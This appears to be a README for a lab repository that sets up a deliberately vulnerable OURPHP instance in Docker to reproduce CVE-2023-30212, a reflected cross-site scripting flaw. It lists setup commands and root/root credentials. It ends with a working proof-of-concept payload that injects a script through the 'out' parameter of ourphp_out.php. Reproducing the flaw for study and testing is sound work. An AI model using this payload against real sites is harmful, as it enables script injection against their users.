## https://sploitus.com/exploit?id=0388EE96-0F76-5D8B-BAD1-92F5CD694079
# Vulnerable-Docker-CVE-2023-30212-
This contains the necessary directories and Dockerfile to replicate A vulnerabality in OURPHP that has a XSS Vulnerability (CVE-2023-30212).
# Creating a Vulnerable Docker Environment (CVE-2023-30212)
**PRE-REQUISITS**
Download Docker
`sudo apt install -y docker.io`
# Follow below commands step by step:
**Download the files from this repository using git clone**
`git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git` .
This contains necessary directories and dockerfile to replicate the scenario.
After Downloading the files , build a docker image using
`sudo docker build -t <Give_Suitable_Docker_name> . ` .
! Add a name to the Docker image so that it can be called later.
Convert the Docker image into a container by using
`sudo docker run -d -p 80:80 <Docker_Image_Name> ` .
! Here the container port is mapped to port 80.
To see the status of the docker container ,
`sudo docker ps`
After doing these steps,
Enter the localhost and configure OURPHP with following credentials.
Username : root
Password : root
Database Name: data
Now you need to configure username and password for Administrative. Set the following:
Username: root
Password: root
and proceed
So our payload is
`/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>`
add this along with localhost or 127.0.0.1 to trigger XSS.